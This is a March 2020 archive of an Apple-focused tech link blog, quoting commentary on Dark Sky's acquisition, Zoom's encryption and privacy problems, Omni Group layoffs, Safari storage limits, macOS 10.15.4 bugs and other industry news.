Archive for March 2020

Tuesday, March 31, 2020

Apple Buys Dark Sky

Adam Grossman (MacRumors, tweet, Hacker News):

Dark Sky has joined Apple.

[…]

There will be no changes to Dark Sky for iOS at this time. It will continue to be available for purchase in the App Store.

[…]

The [Android] app will no longer be available for download. Service to existing users and subscribers will continue until July 1, 2020, at which point the app will be shut down.

[…]

Our API service for existing customers is not changing today, but we will no longer accept new signups. The API will continue to function through the end of 2021.

Ryan Jones:

Bottom line: Dark Sky is the right purchase for Apple.

They win in one area that matters a lot: rain, now. They have compete coverage. They are built in a modern, improvable way.

Just don’t use it for any future weather forecasts! (>48 hours away)

Update (2020-04-10): John Gruber:

I’m hoping that Apple has acquired Dark Sky not merely to beef up the built-in iPhone Weather app (Apple has no first-party Weather app for iPad or Mac, curiously), but to add hyperlocal weather forecasting APIs to its OSes. This would add a competitive advantage for iOS and MacOS both in terms of weather and privacy. Third-party weather apps are notorious for abusing location privileges.

Nate Gorby:

CARROT Weather’s forecast for today

Update (2021-06-13): David Smith:

Looks like Dark Sky will keep their API active for a year longer than that originally announced.

Nick Heer:

There is a WeatherKit private framework lurking in iOS 15 that does not exist in iOS 14. It currently only contains strings of different weather conditions, but perhaps it will be more substantial and not private in the future.

Zoom Meetings Aren’t End-to-End Encrypted

Micah Lee and Yael Grauer (Hacker News):

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

[…]

Matthew Green, a cryptographer and computer science professor at Johns Hopkins University, points out that group video conferencing is difficult to encrypt end to end. That’s because the service provider needs to detect who is talking to act like a switchboard, which allows it to only send a high-resolution videostream from the person who is talking at the moment, or who a user selects to the rest of the group, and to send low-resolution videostreams of other participants. This type of optimization is much easier if the service provider can see everything because it’s unencrypted.

“If it’s all end-to-end encrypted, you need to add some extra mechanisms to make sure you can do that kind of ‘who’s talking’ switch, and you can do it in a way that doesn’t leak a lot of information. You have to push that logic out to the endpoints,” he told The Intercept. This isn’t impossible, though, Green said, as demonstrated by Apple’s FaceTime, which allows group video conferencing that’s end-to-end encrypted. “It’s doable. It’s just not easy.”

See also: Dan Moren, John Gruber.

Previously:

Update (2020-04-10): Nick Heer:

Lacking end-to-end encryption for video chat is not uncommon. What is unique to Zoom is that they’re lying about it in marketing materials by redefining “end-to-end encryption” to fit their needs.

Matthew Green (Hacker News):

Unfortunately, Citizenlab just put out a few of their own results which are based on reverse-engineering the Zoom software. These raise further concerns that Zoom isn’t being 100% clear about how much end-to-end security their service really offers.

This situation leaves Zoom users with a bit of a conundrum: now that everyone in the world is relying on this software for so many critical purposes, should we trust it? In this mostly non-technical post I’m going to talk about what we know, what we don’t know, and why it matters.

See also: MacRumors, Hacker News.

Oded Gal (Hacker News):

In light of recent interest in our encryption practices, we want to start by apologizing for the confusion we have caused by incorrectly suggesting that Zoom meetings were capable of using end-to-end encryption. Zoom has always strived to use encryption to protect content in as many scenarios as possible, and in that spirit, we used the term end-to-end encryption. While we never intended to deceive any of our customers, we recognize that there is a discrepancy between the commonly accepted definition of end-to-end encryption and how we were using it.

[…]

To be clear, in a meeting where all of the participants are using Zoom clients, and the meeting is not being recorded, we encrypt all video, audio, screen sharing, and chat content at the sending client, and do not decrypt it at any point before it reaches the receiving clients.

That’s not what end-to-end encryption means.

Update (2020-11-27): Zack Whittaker (tweet, Hacker News):

The Federal Trade Commission has announced a settlement with Zoom, after it accused the video calling giant of engaging in “a series of deceptive and unfair practices that undermined the security of its users,” in part by claiming the encryption was stronger than it actually was.

See also: Jon Brodkin.

Omni Group Layoffs

Brent Simmons (tweet):

Omni’s been around for almost 30 years, and I hope it’s around for another 30. It’s one of the great Mac and iOS shops — they will sing songs about Omni, at maximum volume, in the great halls.

But businesses go up and down, and Omni’s had a bit of a down period. Normally that would be fine, but the current economic circumstances turn “a bit of a down period” into something more serious — and, in order to get things going the right way again, the company had to lay off some people. Including me.

For anyone who’s able to hire now, this is a rare opportunity to scoop up some top talent that’s usually off the market.

Mark Boszko (tweet):

People probably know me best for my video production work — please see the output of my last seven years in The Omni Group’s video archives — but I have also done a lot of related development work, and would love to push my career in that direction.

Joel Page:

In short, I designed applications for macOS and iOS. If you look at any of Omni’s applications, you’re looking at my work. Icons, UX, UI, but mostly the icons. I joke that being a UI designer is 95% being a production artist, and that holds pretty true.

All sorts of businesses are affected. Marcin Krzyzanowski was recently laid off from his startup:

I’m looking for new opportunity (yay!) I’ve been doing remote (EU and US) for many years. I’m seasoned iOS Developer, some Mac dev (I’m open to other tech). Interested in contract and/or fulltime.

John Sundell is helping indie developers, many of whom are seeing lower sales:

Normally, this site (and all of my other work) is funded by sponsorships — through non-tracking, privacy-focused (and JavaScript-free) ads that I run on a weekly basis. But for the next two weeks there will be no ads on this site. Instead, each day, I’ll promote a new indie app whose developer has been financially impacted by the current pandemic. For free, with no strings attached.

I hope that, with your support, these indie developers will regain some of that lost revenue through this effort, and that we will all get to discover a few great new apps as well.

[…]

Also, I’d love to see you share your own favorite indie apps on Twitter and other social networks — and if you do, feel free to use the hashtag #IndieSupportWeeks to make those tweets and posts easier to find for everyone who’s following this effort.

Update (2020-04-08): See also: Hacker News.

John Gruber (tweet):

All of this — as Brent says, gestures at everything — aside, it is hard to shake the feeling that the market for independent professional software is coming apart at the seams, fraying irreparably.

Paying for good software is in our own best interest.

Frank Reiff:

OMG. OmniGroup, the IBM of Apple indie development, has laid off a whole bunch of people. If that’s not an indictment of where indies are at, I don’t know what is. Still Apple is getting 30% of all sales and is about to increase busy work for everybody at WWDC again.

Kristina Sontag:

That said, if you need great people in test, design, marketing, support, and engineering let me know and I can connect you!

James Rowland:

Like others, I was laid off from the Omni Group. If you need a PM who knows privacy law and copyright or a Tester who can navigate iOS and Mac app review, give me a shout.

macOS 10.15.4 Broke SSH

Tyler Hall (tweet, Hacker News):

The user in the Apple forums was right. At least in my case, my one server that happened to be running on a non-standard ssh port above 8192 will not connect from Catalina 10.15.4 when using the hostname instead of the IP address.

He’s not the only one:

/usr/bin/ssh in macos 10.15.4 hangs if used with the -p flag to specify an alternate port and used with a hostname. This was not present in macos 10.15.3

[…]

Using maximum verbosity doesn’t give any clues, and max debugging on the sshd target host shows no connection is ever initiated[…]

vgene:

I had the same problem on a MacBook after upgrading to 10.15.4. However, I wasn’t using a port number higher than 8192, the socket was 75 with a hostname. The problem was solved when I replaced the hostname with its IP or plugged in an Ethernet Cable. I tried to restart mDNSResponder and flush the dns cache and switch to a different DNS server. Nothing works so far.

Previously:

The Internet Archive’s National Emergency Library

The Internet Archive (Hacker News):

On March 17, the American Library Association Executive Board took the extraordinary step to recommend that the nation’s libraries close in response to the COVID-19 outbreak. In doing so, for the first time in history, the entirety of the nation’s print collection housed in libraries is now unavailable, locked away indefinitely behind closed doors.

And so, to meet this unprecedented need at a scale never before seen, we suspended waitlists on our lending collection. As we anticipated, critics including the Authors Guild and the Association of American Publishers have released statements (here and here) condemning the National Emergency Library and the Internet Archive. Both statements contain falsehoods that are being spread widely online. To counter the misinformation, we are addressing the most egregious points here and have also updated our FAQs.

I don’t see anything about the legal basis for suspending waitlists, i.e. allowing unlimited simultaneous checkouts. I suspect there is none.

On the one hand, with libraries closed, there are lots of library copies that should be in circulation but aren’t. Internet Archive is solving a real problem. On the other hand, what’s the principle here? Can any site claim to be acting on behalf of libraries, distribute whatever content they want, and force the copyright holders to opt out rather than opt in?

Previously:

Update (2020-06-02): TorrentFreak:

Today, major publishers Hachette Book Group, Inc., HarperCollins Publishers LLC, John Wiley & Sons, Inc., and Penguin Random House LLC went to war with the project by filing a copyright infringement lawsuit against the Internet Archive and five ‘Doe’ defendants in a New York court.

[…]

Claiming that IA is hiding behind “an invented theory” simply labeled Controlled Digital Lending, the publishers maintain there is nothing in copyright law that allows anyone to systematically copy and distribute digital book files simply because they claim to own an original physical copy.

Furthermore, IA’s loosening of its own CDL rules at the time of the pandemic only made matters worse, as it came precisely when book market players were also under pressure to survive.

Update (2020-06-11): Brewster Kahle (via Hacker News):

Today we are announcing the National Emergency Library will close on June 16th, rather than June 30th, returning to traditional controlled digital lending. We have learned that the vast majority of people use digitized books on the Internet Archive for a very short time. Even with the closure of the NEL, we will be able to serve most patrons through controlled digital lending, in part because of the good work of the non-profit HathiTrust Digital Library. HathiTrust’s new Emergency Temporary Access Service features a short-term access model that we plan to follow.

We moved up our schedule because, last Monday, four commercial publishers chose to sue Internet Archive during a global pandemic.

Unmasking Twitter

Twitter:

Broadening our definition of harm to address content that goes directly against guidance from authoritative sources of global and local public health information. Rather than reports, we will enforce this in close coordination with trusted partners, including public health authorities and governments, and continue to use and consult with information from those sources when reviewing content. Under this new guidance, we will require people to remove tweets that include[…]

[…]

Description of harmful treatments or protection measures which are known to be ineffective, do not apply to COVID-19, or are being shared out of context to mislead people, even if made in jest, such as “drinking bleach and ingesting colloidal silver will cure COVID-19.”

This is quite a statement and a difficult situation for Twitter to be in. Obviously, there is a lot of misinformation out there, and they don’t want Twitter to be overrun with it. But some information from health and government sources has turned out to be incorrect, and different authoritative sources don’t always agree with one another. Some potential treatments are approved in certain jurisdictions but banned in others. Knowledge is evolving by the day, but nothing is going to be truly verified scientifically until after this is all over.

Ben Thompson:

Everyone is taking their guidance from the WHO, and that’s a problem. […] It seems likely this paragraph about the lack of asymptomatic transmission was strongly argued for by China.

[…]

And yet, Director General Tedros Adhanom Ghebreyesus argued — on Twitter! — that asymptomatic carriers were not a concern[…]

Again, an increasing amount of evidence is that this just isn’t true: asymptomatic carriers are a major problem.

[…]

It sure seems like multiple health authorities — the experts Twitter is going to rely on — have told us that masks “are known to be ineffective”: is Twitter going to delete the many, many, many tweets — some of which informed this article — arguing the opposite?

The answer, obviously, is that Twitter won’t, because this is another example of where Twitter has been a welcome antidote to “experts”; what is striking, though, is how explicitly this shows that Twitter’s policy is a bad idea, not just because it allows countries like China to indirectly influence its editorial decisions, but also because it limits the search for truth.

Previously:

Update (2020-04-08): Mike Rockwell:

Unfortunately, this is the path that we have to take. If only because advertisers will demand it — they don’t want to see their brand promoted next to anything they consider to be misleading, incorrect, dangerous, or objectionable. But hopefully we’ll all eventually move away from these platforms, before things get too bad, toward a more open web where each of us share our ideas on our own domains.

Update (2020-04-23): Donie O’Sullivan (via Hacker News):

Facebook says it has removed promotion of anti-quarantine events in California, New Jersey, and Nebraska after consultation with state governments

See also: Slashdot.

Monday, March 30, 2020

Xattrs Make Time Machine Backups Waste Space

Howard Oakley:

When metadata used to change relatively infrequently, this had little in the way of adverse effects. Now that security and privacy protection are doing so much with extended attributes, the unintended consequence is that many of the files which are copied into each Time Machine backup haven’t actually changed in substance, but a quarantine flag has been added, for instance.

It’s easy to demonstrate this in action if you’re making Time Machine backups. Simply create a sizeable PDF file which doesn’t have a quarantine flag attached to it, or strip the flag from a file which already has one. Leave the file alone for the next automatic backup. After that, open the document using Preview, which will in a fraction of a second automatically write a quarantine flag to it. Leave it for the next automatic backup, and that backup will contain a second copy of that PDF which only differs in that quarantine flag, maybe as little as 31 bytes in all. Imagine this happening to many 10 GB movie clips and you see where this is heading.

Previously:

“Cursor,” “Pointer,” and “Insertion Point”

John Gruber:

For clarity, it’s best not to refer to either of these things as cursors. Instead:

  • Mouse/trackpad pointer.
  • Insertion point.

This terminology has been slightly confusing over the last week, since Apple’s surprise announcement of pointer support in iPadOS 13.4. In their marketing materials, Apple is calling pointers “cursors”.

[…]

In its technical documentation, Apple is clear.

The new API calls it a “pointer,” but Carbon and Cocoa have historically used “cursor.” Of course, “pointer” also has another meaning in code.

Dr. Drang:

For 35 years, Apple’s been telling me this thing should called a pointer, and I’ve been following along, mainly because I thought the distinction between a pointer and a cursor was useful.

Previously:

Friday, March 27, 2020

Old macOS Desktop Pictures, Upscaled

Stephen Hackett (via John Gruber):

Every major version of Mac OS X macOS has come with a new default wallpaper. As you can see, I have collected them all here.

While great in their day, the early wallpapers are now quite small in the world of 5K displays.

Major props to the world-class designer who does all the art of Relay FM, the mysterious @forgottentowel, for upscaling some of these for modern screens.

See also: Joe Groff.

Previously:

Chris Lattner on Swift, TensorFlow, MLIR, and SiFive

Accidental Tech Podcast (tweet) has a very interesting interview with Chris Lattner, covering a wide range of programming language and compiler topics, as well as the future of WWDC.

Previously:

Update (2020-04-10): See also: MacRumors.

Amazon Sellers “Hijack” Listings to Sell Face Masks

Louise Matsakis (via Hacker News):

The 148th most popular book on Amazon Wednesday wasn’t actually a book at all: It was a package of 50 disposable face masks—the kind that shoppers have scrambled to buy amid the coronavirus pandemic. Surging demand for masks, as well as supplies like hand sanitizer and disinfectant wipes, has emptied store shelves, and in some cases led to skyrocketing prices on Amazon.

[…]

“Face masks and hand sanitizers are the number one and number two most searched terms on Amazon. That's attracting many sellers who are pulling every trick they can think of to get into search results,” says Juozas Kaziukėnas, founder of the ecommerce data firm Marketplace Pulse, who first alerted WIRED to the face mask listings.

[…]

By the end of February, Amazon announced it had removed 1 million products that were falsely advertised to defend against or cure Covid-19, as well as tens of thousands of items listed for inflated prices.

Previously:

Thursday, March 26, 2020

Safari 13.1: Third-Party Cookie Blocking and 7-Day Script-Writeable Storage

John Wilander (tweet):

Cookies for cross-site resources are now blocked by default across the board. This is a significant improvement for privacy since it removes any sense of exceptions or “a little bit of cross-site tracking is allowed.”

[…]

Safari continues to pave the way for privacy on the web, this time as the first mainstream browser to fully block third-party cookies by default.

[…]

Now ITP has aligned the remaining script-writable storage forms with the existing client-side cookie restriction, deleting all of a website’s script-writable storage after seven days of Safari use without user interaction on the site.

[…]

That is the case in Safari. Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer. We do not expect the first-party in such a web application to have its website data deleted.

The existing cookie restrictions have been really frustrating. There are many sites that I visit monthly, and so I need to enter my username and password every single time. I don’t understand why cookies, of all things, don’t have site-specific settings in Safari. I don’t like cookies in general, but there are some sites that I want to trust. Sometimes I wonder whether I should write a script to auto-open them weekly to keep the cookies warm.

Ole Begemann:

I love the WebKit/Safari teams’ continuing work on limiting third-party cookies and other forms of tracking. I hope they tackle first-party tracking next.

Of the hundreds of websites I visit, I really only want to allow a handful to set cookies, and then perhaps only for a short time.

Safari now has 11 categories of site-specific configuration. It’s strange thatookies/local storage is not one of them.

Aral Balkan:

On the face of it, WebKit’s announcement yesterday titled Full Third-Party Cookie Blocking and More sounds like something I would wholeheartedly welcome. Unfortunately, I can’t because the “and more” bit effectively kills off Offline Web Apps and, with it, the chance to have privacy-respecting apps like the prototype I was exploring earlier in the year based on DAT.

[…]

If I use the app in Safari on iOS without adding it to Home Screen and leave it for seven days, will my shopping list be deleted?

If I do the same thing on Safari for macOS (which doesn’t have a Home Screen), will my shopping list be deleted?

Andre Garzia (via Hacker News):

There is a huge opportunity for the creation of private client-side-only PWAs in the world but developers wanting to build such apps are in for an uphill battle against the status quo and now against Apple as well.

[…]

I want to remind everyone that installing to the home screen is not what makes a PWA, it is an optional step. A PWA is still a PWA if the user access it only occasionally by typing the URL on the browser or keeping a bookmark. I access many PWAs on my phone but they are not in my home screen because I like to keep it clean. My browser “new tab” lists them for me, they are still as much a PWA as the ones in your home screen.

Saying that you should build a native app is not an answer. Native apps need to go through gatekeepers, the web does not. The web is the only mass communication media where we all have publishing access (to some degree at least), native iOS apps are not like this. There is a reason Mozilla can’t ship Firefox with Gecko on iOS and the reason is not because they don’t know how to do it. Apple is doing this in the name of privacy but what it actually does is force developers closer to their app store.

Jasper Patterson:

At 1Password we are concerned about the sudden announcement that LocalStorage will expire after 7 days, and want to provide our use case of browser storage and how this will cause harm to our users (including irreversible data loss to some).

We have a full featured web app at 1Password.com that allows users to signup for an account, access their vaults, and perform admin functions for their business.

[…]

The Secret Key is a randomly generated string generated locally during signup and stored on devices users have previously used. This key is required for users to decrypt their vaults. Given that most signups occur in a web browser, that is the first place we store this critical piece of data. While we do try to encourage users to install our native applications, for some (unknown) number of users out there LocalStorage in their browser will be the only place they have this key saved, and in 7 days may now become irreversibly locked out of their 1Password vaults.

Previously:

Half of me knows I’ll rarely use and never prefer a PWA on iOS over a native app, so I know that none of this really matters nor will affect me.

The other half of me wants everyone to adhere to the platonic ideal of the web and thinks Apple should stop doing this shit.

1Password:

When you set up the 1Password apps, your Secret Key will be saved in the apps. So if it gets removed from Safari, you’ll still be able to access your account. It’s an important first step, but there’s more you can do to protect your account.

I’ve seen a new bug since updating to Safari 13.1: specifying Finder tags when using File ‣ Save As in Web Archive format doesn’t actually add the tags to the file.

WebKit/Safari announcement to delete local storage after 7 days of non-use is a terrible thing since it doesn’t mention file:// origins nor UX overrides, particularly per-site settings. Apart from big, public issues like password managers, what about internal tools?

Deleting local storage after 7 days without any user control has the possibility to lose valuable user data. It also kills an entire class of applications. Users do actually want web apps that are able to store some data locally, under the user’s control.

Retina MacBook Air Staingate

Joe Rossignol (tweet):

Apple this week acknowledged that MacBook Air models with Retina displays can exhibit anti-reflective coating issues, as indicated in a memo shared with Apple Authorized Service Providers and obtained by MacRumors.

[…]

Apple’s internal service documentation for this issue previously only mentioned MacBook Pro and discontinued 12-inch MacBook models with Retina displays, but the MacBook Air is now mentioned in at least two places. Apple added a Retina display to the MacBook Air in October 2018 and all models of the notebook have featured once since.

This has been going on for even longer than the butterfly keyboards. So far the repair program is only for MacBook Pros.

Marcin Krzyzanowski:

Apple Care just

1. Rejected my claim for broken screen #staingage
2. Rejected my claim for broken keyboard (clean with air instead)
4. Rejected my battery claim

[…]

this is via Reseller (of course). When I was at Apple Store, they were ready to replace the screen, I just couldn’t wait a few days.

this is ridiculous. They advise me to go to the Apple Store instead. The nearest Apple Store is 580km away.

Previously:

Update (2020-03-27): John Gruber:

I don’t understand how this is still an issue. My beloved 2014 13-inch MacBook Pro is afflicted with this, and I never bothered getting it repaired. Whatever causes this, you’d think Apple would’ve identified the problem after a few years.

Zoom Attention Tracking and Facebook

Wolfgang (Hacker News):

ZOOM monitors the activity on your computer and collects data on the programs running and captures which window you have focus on.

If you manage the calls, you can monitor what programs users on the call are running as well.

EFF (Hacker News):

The host of a Zoom call has the capacity to monitor the activities of attendees while screen-sharing. This functionality is available in Zoom version 4.0 and higher. If attendees of a meeting do not have the Zoom video window in focus during a call where the host is screen-sharing, after 30 seconds the host can see indicators next to each participant’s name indicating that the Zoom window is not active.

[…]

Zoom allows administrators to see detailed views on how, when, and where users are using Zoom, with detailed dashboards in real-time of user activity. Zoom also provides a ranking system of users based on total number of meeting minutes. If a user records any calls via Zoom, administrators can access the contents of that recorded call, including video, audio, transcript, and chat files, as well as access to sharing, analytics, and cloud management privileges.

See also: Nick Heer.

discreditable:

When someone sends you a zoom invite, cancel the download, then click the having problems link to download again. Cancel it again. It will show you a link to join by browser.

Joseph Cox (tweet, Hacker News):

What the company and its privacy policy don’t make clear is that the iOS version of the Zoom app is sending some analytics data to Facebook, even if Zoom users don’t have a Facebook account, according to a Motherboard analysis of the app.

This sort of data transfer is not uncommon, especially for Facebook; plenty of apps use Facebook’s software development kits (SDK) as a means to implement features into their apps more easily, which also has the effect of sending information to Facebook. But Zoom users may not be aware it is happening, nor understand that when they use one product, they may be providing data to another service altogether.

Previously:

Update (2020-04-10): Joseph Cox:

On Friday video-conferencing software Zoom issued an update to its iOS app which stops it sending certain pieces of data to Facebook.

David Heinemeier Hansson:

Zoom has stopped the data leakage to Facebook. That’s good. But their privacy policy is still a complete trash fire that belittles privacy legislation, and grants themselves the right to do exactly what they were just caught doing.

Eric S. Yuan (Hacker News):

We originally implemented the “Login with Facebook” feature using the Facebook SDK for iOS (Software Development Kit) in order to provide our users with another convenient way to access our platform. However, we were made aware on Wednesday, March 25, 2020, that the Facebook SDK was collecting device information unnecessary for us to provide our services.

Will Strafach:

absolutely wild how companies are comfortable admitting that they have no clue what kinds of code they are including in their apps, and have to be “made aware” of what their own apps are doing.

John Gruber (tweet):

This Facebook data issue is nowhere near as bad as the web server issue. But it betrays Zoom’s institutionally cavalier attitude to privacy. Their privacy policy more or less grants them carte blanche to do whatever the hell they want.

Mistakes happen. Bugs happen. I not only forgive mistakes, I enjoy forgiving mistakes. But Zoom’s callous disregard for privacy does not seem to be a mistake. As Zoom itself said about the hidden web server they secretly installed on Macs, it’s a feature not a bug.

Joseph Cox:

On Monday a user of the popular video-conferencing software Zoom filed a class action lawsuit against the company for sending data to Facebook. The lawsuit argues that Zoom violated California's new data protection law by not obtaining proper consent from users about the transfer of the data.

Wednesday, March 25, 2020

Little Snitch and the Deprecation of Kernel Extensions

Rich Trouton:

As part of macOS Catalina 10.15.4, Apple has begun displaying a new dialog window message concerning third-party kernel extensions.

[…]

To further reinforce the message that kernel extensions are going away, Apple refers to them in the message window as “legacy system extensions”.

[…]

For a number of managed environments, these messages can be prevented from appearing. As long as a third-party kernel extension is whitelisted using an appropriate configuration profile, the message for it should not appear.

Norbert Heger (Hacker News):

We expect the deprecation to become effective with the next major release of macOS. There’s no official release date from Apple, but based on the release schedule of recent years it will not be before this fall. Little Snitch 4 will then not be loaded by the operating system, but there will still be an option to allow the loading.

[…]

The replacement APIs that are currently available (NetworkExtension framework on macOS 10.15.4) are not yet completely sufficient to implement the full functionality of Little Snitch. But we are working closely with Apple to fill the remaining gaps and we expect that a beta of the next major macOS version (most likely available at the next WWDC) or even an upcoming version of 10.15 will provide what is missing. As soon as the APIs allow us, we will complete the transition of Little Snitch to the new NetworkExtension API. It’s our goal to provide a public beta in June 2020 and a stable version in October.

Previously:

Update (2020-03-27): Greg Hurrell:

I sure hope this doesn’t end up breaking Karabiner-Elements. If I had to use a machine without it, it would seriously impact usability for me. When the day comes that Apple breaks kernel extensions once and for all, I’ll be holding off on OS updates for as long as I can.

Adam Engst:

Unfortunately, since the dialogs give only the developers’ names, not the names of their apps, it’s difficult to know who I might contact. A Google search revealed that Ludovic Leger is the dev lead on TripMode, a useful utility I recommend for managing bandwidth use while away from high-speed networks; see “TripMode Prevents Unwanted Internet Data Usage on a Tethered Mac” (22 July 2015). I’m still not sure who Steven Yan is, or what app of his I might be using. That’s not a problem now, but it might be in a few months once the beta of whatever macOS version follows Catalina comes out.

Update (2020-06-05): Takayama Fumihiko:

Current status of Karabiner-Elements: I’m working to both DriverKit virtual keyboard and pure software keyboard using IOHIDSystem.

The IOHIDSystem library is re-implemented which was used in old Karabiner-Elements.

Update (2021-07-26): Patrick Wardle:

🙋‍♂️Who’s frustrated by Apple deprecating APIs only to provide a broken replacement!?

Several years ago NKEs were deprecated.

This forced devs to rewrite their tools to use Apple’s new (buggy) Network Extensions ...and since then deal w/ a deluge of user-submitted bug reports😭

Xcode 11.4 and Swift 5.2

Xcode 11.4 is now available for download (release notes). Alas, it requires Catalina.

Ted Kremenek:

Swift 5.2 is now officially released! 🎉

[…]

We have drastically improved the quality and precision of error messages in the Swift compiler.

[…]

The compiler leaves “breadcrumbs” when it encounters failures while inferring types in an expression, recording every specific failure along the way. These breadcrumbs allow the compiler to produce precise diagnostics, often with actionable fixes, that lead the developer toward correct code. Below are a few examples of improved error messages.

[…]

In Swift 5.2, the internal representation of declarations in the compiler is immutable, and the code generation phase of the compiler is able to trigger lazy evaluation of requests, the result of which are cached. Since requests are more fine-grained than the old validation step, this improves performance by avoiding wasted work. It also improves correctness, fixing a significant number of correctness issues where the type checker did not anticipate needing to validate something that was later required for code generation.

Code completion is also improved.

Esther Hare (Mac Rumors):

Universal purchase for Mac apps now available.

Previously:

Update (2020-03-27): See also: SDK API Differences.

Update (2020-05-22): Craig Hockenberry:

Here’s a thing I never thought would happen: I need to stay on Mojave on my main development machine, and the current version of Xcode won’t run there, so I’ve stopped updating my iPhone so I can continue to install and debug.

Good job, folks.

A Different Zoom in the Mac App Store

Jeff Johnson:

Remember when people bought the wrong Zoom stock because ZOOM is Zoom Technologies, whereas ZM is Zoom Video Communications? Well they’re at it again, this time on the Mac App Store instead of the stock market. “Zoom is an [sic] screen magnifier” […]

[…]

The fact that mistakenly purchased abandonware is among the top paid apps is an indictment of the Mac App Store. Why isn’t the “real” Zoom on the Mac App Store? I don’t have any insider information, but as a Mac developer I can make an educated guess: Mac App Store policies. Specifically, Mac App Store policies that restrict API usage, especially the sandboxing requirement.

Previously:

Update (2020-04-10): Jeff Johnson:

The misidentified, mistakenly purchased Zoom app is now #1 top paid.

Update (2020-04-15): Jeff Johnson:

The mistakenly purchased “Zoom” Mac app, which hasn’t been updated in 4 years, did nonetheless raise its price in the past week.

Too Hard to Delay Daylight Saving Time

Times of Israel:

Israel could delay switching to daylight saving time to discourage public traffic in the streets in the evening hours and promote social distancing, as part of the fight against the coronavirus, Interior Minister Aryeh Deri said Sunday.

Currently, clocks are planned to spring forward later this week, on the night between March 26 and March 27.

Via Dave DeLong:

Oh, and we’ve got 5 days to change and distribute the timezone databases 😉

Hana Levi Julian:

The government decided this week against going ahead with the change from winter time to summer time, mainly because there were too many complications involved in dealing with the digital presets of the servers and other computers and equipment that were already set up for the change to a summer clock to take place overnight between this coming Thursday and Friday.

Tuesday, March 24, 2020

macOS 10.15.4

Apple (combo update):

macOS Catalina 10.15.4 introduces iCloud Drive folder sharing, Screen Time communication limits, Apple Music time-synced lyrics view, and more. The update also improves the stability, reliability, and security of your Mac.

There’s no mention of Mail fixes, and I already have multiple reports that the bug where messages disappear when dragged to another mailbox is still present. Another customer said that the update did fix the bug he was seeing where rules copied messages instead of moving them.

Previously:

Update (2020-03-27): See also: Howard Oakley, MacRumors.

Joachim Fornallaz:

A great update of macOS with changes to Photos improving library upgrades, exports, printing, and iCloud downloads.

Tanner Bennett:

macOS update notifications are so user-hostile nowadays. No way to dismiss without agreeing to another notification within the next 24 hours, and really no way to turn them off at all either.

I have update checking turned off but I got a notification just now.

Adam Engst (forum):

To share an iCloud Drive folder in 10.15.4, Control-click it in the Finder and choose Share > Add People. macOS’s odd modal dialog appears, letting you set who can access the folder (invitees or anyone with the link) and what permissions they have (view only or make changes). Select a sharing mechanism at the top and enter the name of the person with whom you want to share, click Share, and you’re done.

Gus Mueller (tweet):

This is a quick developer PSA. MacOS 10.15.4 was just released, and there was a minor change in the way NSAttributedString’s -initWithHTML:options:documentAttributes method works. Previously (10.15.3 and earlier) if you passed a HTML snippet using HelveticaNeue with a size of 20, the minimum line height for the attributed string was set to 25 (and if you passed 40 for the font size, you’d get 49). With 10.15.4 the minimum line height is now set to 0. I’m actually in favor of this change, but if you were expecting certain layouts to happen based on the previous defaults, things might look different for you.

Howard Oakley:

A few users are reporting that, following upgrading their Mac to Catalina 10.15.4, one or more of its USB-C/Thunderbolt 3 ports stops working.

Although uncommon, if your Mac suffers this the remedy is straightforward: reset its SMC.

Aerial Brings Apple TV Screen Savers to the Mac

Josh Centers:

One of the best features of the Apple TV is its Aerial screen saver. That’s not hyperbole—Apple always makes a big deal out of the new scenes it adds to tvOS, often promoting them as a marquee feature of major tvOS updates. If you have liked these screen savers on your TV, you can get them on your Mac, thanks to the free and open-source app Aerial.

I’m not really a screen saver person, but I really like this one.

It uses a ton of disk space—unless you turn off caching, in which case it uses a ton of bandwidth. Unfortunately, Catalina sandboxing issues mean that the cache folder has to be stored on the system drive, i.e. your SSD, rather than on a hard drive that may have more free space.

Previously:

Update (2020-03-27): Tanner Bennett:

Yeah, Catalina really ruined a lot about what I loved about that screensaver. You used to be able to use the arrow keys to skip to a different one too.

Making Swift Properties Overridable Only in Debug Builds

John Sundell:

Occasionally, we might want to override certain properties in order to facilitate testing, to be able to work on a new feature, or to debug a problem.

[…]

Here’s a way to mitigate that problem, using Swift’s new property wrappers feature in combination with the DEBUG compiler flag. By creating a DebugOverridable property wrapper, we can enforce that the properties that we wish to override during testing and development are not actually overridden within any of our code that we’re shipping to production[…]

This is a neat trick, though unfortunately property wrappers don’t work with @NSManaged. What I have been doing is having my tests use underscored versions of the properties. These are a declared in an extension, which is conditionally compiled only when the TEST flag is set.

I’d still like to see Swift’s access controls reworked to make testing easier. @testable import doesn’t really do the job because it only works for symbols that are already visible at the package level. So you can only use private for stuff that will never be used from tests.

Previously:

Fast

Patrick Collison (Hacker News):

Dee Hock was given 90 days to launch the BankAmericard card (which became the Visa card), starting from scratch.

[…]

Walt Disney’s conception of “The Happiest Place on Earth” was brought to life in 366 days.

[…]

Brendan Eich implemented the first prototype for JavaScript in 10 days, in May 1995. It shipped in beta in September of that year.

[…]

Work on the Xerox Alto, the first GUI-oriented computer, started in November 1972 because of a bet: “Chuck said that a futuristic computer could be done ‘in three months’ and a Xerox exec bet him a case of wine that it couldn’t be done”.

[…]

Tony Fadell was hired to create the iPod in late January 2001 […] and shipped the first production iPod to customers in November 2001, around 290 days after getting started.

[…]

Linus Torvalds started working on Git on April 3 2005. It was self-hosting 4 days later. On April 20 2005, 17 days after work commenced, Linux 2.6.12-rc3 was publicly released with Git.

But modern physical infrastructure projects take longer.

Previously:

Update (2020-03-27): Patrick Collison:

I asked Tony Fadell about the iPod timeline for my fast project page. Summary: 😯.

Amazon Prime Delivery Delays

Jason Del Rey:

During normal times, Amazon Prime deliveries typically arrive in one or two days in the US. Now, some Prime deliveries for in-stock items are showing five-day delivery promises on the lower end, but those waits are as long as a month on some items.

An Amazon spokesperson confirmed to Recode on Sunday evening that the new April 21 delivery dates are not the result of a technical bug or error; they accurately reflect Amazon’s current reality.

“To serve our customers in need while also helping to ensure the safety of our associates, we’ve changed our logistics, transportation, supply chain, purchasing, and third-party seller processes to prioritize stocking and delivering items that are a higher priority for our customers,” the spokesperson said in a statement. “This has resulted in some of our delivery promises being longer than usual.”

Update (2020-03-27): See also: Hacker News.

Brian Heater:

Amazon today confirmed that an employee in its Queens, N.Y. fulfillment center has tested positive for the novel coronavirus.

[…]

